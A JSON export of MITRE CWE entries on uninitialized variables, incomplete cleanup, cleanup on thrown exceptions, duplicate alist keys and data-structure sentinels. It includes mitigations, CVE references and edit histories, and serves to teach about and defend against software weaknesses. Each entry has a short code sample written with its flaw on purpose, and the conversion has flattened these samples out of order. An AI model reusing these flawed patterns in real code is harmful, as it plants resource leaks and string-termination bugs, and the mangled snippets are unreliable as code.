variable"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Uninitialized Variable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Uninitialized Variable","attr":{"@_Date":"2008-04-11"}}}},"458":{"attr":{"@_ID":"458","@_Name":"DEPRECATED: Incorrect Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because its name and description did not match. The description duplicated CWE-454, while the name suggested a more abstract initialization problem. Please refer to CWE-665 for the more abstract problem.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incorrect Initialization","attr":{"@_Date":"2008-04-11"}}}},"459":{"attr":{"@_ID":"459","@_Name":"Incomplete Cleanup","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly \\"clean up\\" and remove temporary or supporting resources after they have been used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insufficient Cleanup"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity"],"Impact":["Other","Read Application Data","Modify Application Data","DoS: Resource Consumption (Other)"],"Note":"It is possible to overflow the number of temporary files because directories typically have limits on the number of files allowed. This could create a denial of service problem."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Temporary files and other supporting resources should be deleted/released immediately after they are no longer needed."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Stream resources in a Java application should be released in a finally block, otherwise an exception thrown before the call to close() would result in an unreleased I/O resource. In the example below, the close() method is called in the try block (incorrect).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"#text":"InputStream is = new FileInputStream(path);byte b[] = new byte[is.available()];is.read(b);is.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"log.error(\\"Something bad happened: \\" + t.getMessage());","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0552","Description":"World-readable temporary file not deleted after use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0552"},{"Reference":"CVE-2005-2293","Description":"Temporary file not deleted after use, leaking database usernames and passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2293"},{"Reference":"CVE-2002-0788","Description":"Interaction error creates a temporary file that can not be deleted due to strong permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0788"},{"Reference":"CVE-2002-2066","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2066"},{"Reference":"CVE-2002-2067","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2067"},{"Reference":"CVE-2002-2068","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2068"},{"Reference":"CVE-2002-2069","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2069"},{"Reference":"CVE-2002-2070","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2070"},{"Reference":"CVE-2005-1744","Description":"Users not logged out when application is restarted after security-relevant changes were made.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1744"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Cleanup"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Notes":{"Note":[{"#text":"CWE-459 is a child of CWE-404 because, while CWE-404 covers any type of improper shutdown or release of a resource, CWE-459 deals specifically with a multi-step shutdown process in which a crucial step for \\"proper\\" cleanup is omitted or impossible. That is, CWE-459 deals specifically with a cleanup or shutdown process that does not successfully remove all potentially sensitive data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps other categories such as permissions and containment. Concept needs further development. This could be primary (e.g. leading to infoleak) or resultant (e.g. resulting from unhandled error conditions or early termination).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"460":{"attr":{"@_ID":"460","@_Name":"Improper Cleanup on Thrown Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.","Extended_Description":"Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"The code could be left in a bad state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class foo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final void main( String args[] ) {}public static final boolean doStuff( ) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean returnValue;returnValue=doStuff();","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean threadLock;boolean truthvalue=true;try {}catch (Exception e){}return truthvalue;","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while() {}","xhtml:br":["","",""],"xhtml:i":"//check some condition","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"threadLock=true; //do some stuff to truthvaluethreadLock=false;","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.err.println(\\"You did something bad\\");if (something) return truthvalue;","xhtml:br":["",""]}}]}}],"xhtml:br":""}}}},"Body_Text":"In this case, you may leave a thread locked accidentally."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper cleanup on thrown exception"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR03-J","Entry_Name":"Restore prior object state on method failure"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"462":{"attr":{"@_ID":"462","@_Name":"Duplicate Key in Associative List (Alist)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error.","Extended_Description":"A duplicate key entry -- if the alist is designed properly -- could be used as a constant time replace function. However, duplicate key entries could be inserted by mistake. Because of this ambiguity, duplicate key entries in an association list are not recommended and should not be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a hash table instead of an alist."},{"Phase":"Architecture and Design","Description":"Use an alist which checks the uniqueness of hash keys with each entry before inserting the entry."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code adds data to a list and then attempts to sort the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"alist = []while (foo()): #now assume there is a string data with a key basename","xhtml:br":"","xhtml:div":{"#text":"queue.append(basename,data)queue.sort()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Since basename is not necessarily unique, this may not sort how one would like it to be."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Duplicate key in associative list (alist)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV02-C","Entry_Name":"Beware of multiple environment variables with the same effective name"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"463":{"attr":{"@_ID":"463","@_Name":"Deletion of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental deletion of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Often times data-structure sentinels are used to mark structure of the data structure. A common example of this is the null character at the end of strings. Another common example is linked lists which may contain a sentinel to mark the end of the list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the deletion or modification outside of some wrapper interface which provides safety.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":"Other","Note":"Generally this error will cause the data structure to not work properly."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If a control character, such as NULL is removed, one may cause resource access control problems."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example creates a null terminated string and prints it contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;int counter;foo=calloc(sizeof(char)*10);for (counter=0;counter!=10;counter++) {printf(\\"%s\\\\n\\",foo);}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"foo[counter]=\'a\';","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The string foo has space for 9 characters and a null terminator, but 10 characters are written to it. As a result, the string foo is not null terminated and calling printf() on it will have unpredictable and possibly dangerous results."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deletion of data-structure sentinel"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;NUL-Termination Problems&#34;, Page 452"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Deletion of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"464":{"attr":{"@_ID":"464","@_Name":"Addition of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental addition of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Data-structure sentinels are often used to mark the structure of data. A common example of this is the null character at the end of strings or a special sentinel to mark the end of a linked list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the addition or modification of sentinels.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Generally this error will cause the data structure to not work properly by truncating the data."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Encapsulate the user from interacting with data sentinels. Validate user input to verify that sentinels are not present."},{"Phase":"Implementation","Description":"Proper error checking can reduce the risk of inadvertently introducing sentinel values into data. For example, if a parsing function fails or encounters an error, it might return a value that is the same as the sentinel."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. This is not a complete solution."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example assigns some character values to a list of characters and prints them each individually, and then as a string. The third character value is intended to be an integer taken from user input and converted to an int.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;foo=malloc(sizeof(char)*5);foo[0]=\'a\';foo[1]=\'a\';foo[2]=atoi(getc(stdin));foo[3]=\'c\';foo[4]=\'\\\\0\'printf(\\"%c %c %c %c %c \\\\n\\",foo[0],foo[1],foo[2],foo[3],foo[4]);printf(\\"%s\\\\n\\",foo);","xhtml:br":["","","","","","","",""]}},"Body_Text":"The first print statement will print each character separated by a space. However, if a non-integer is read from stdin by getc, then atoi will not make a conversion and return 0. When foo is printed as a string, the 0 at character foo[2] will act as a NULL terminator and foo[3] will never be printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Addition of data-structure sentinel"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR06-C","Entry_Name":"Do not assume that strtok() leaves the parse string unchanged"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, 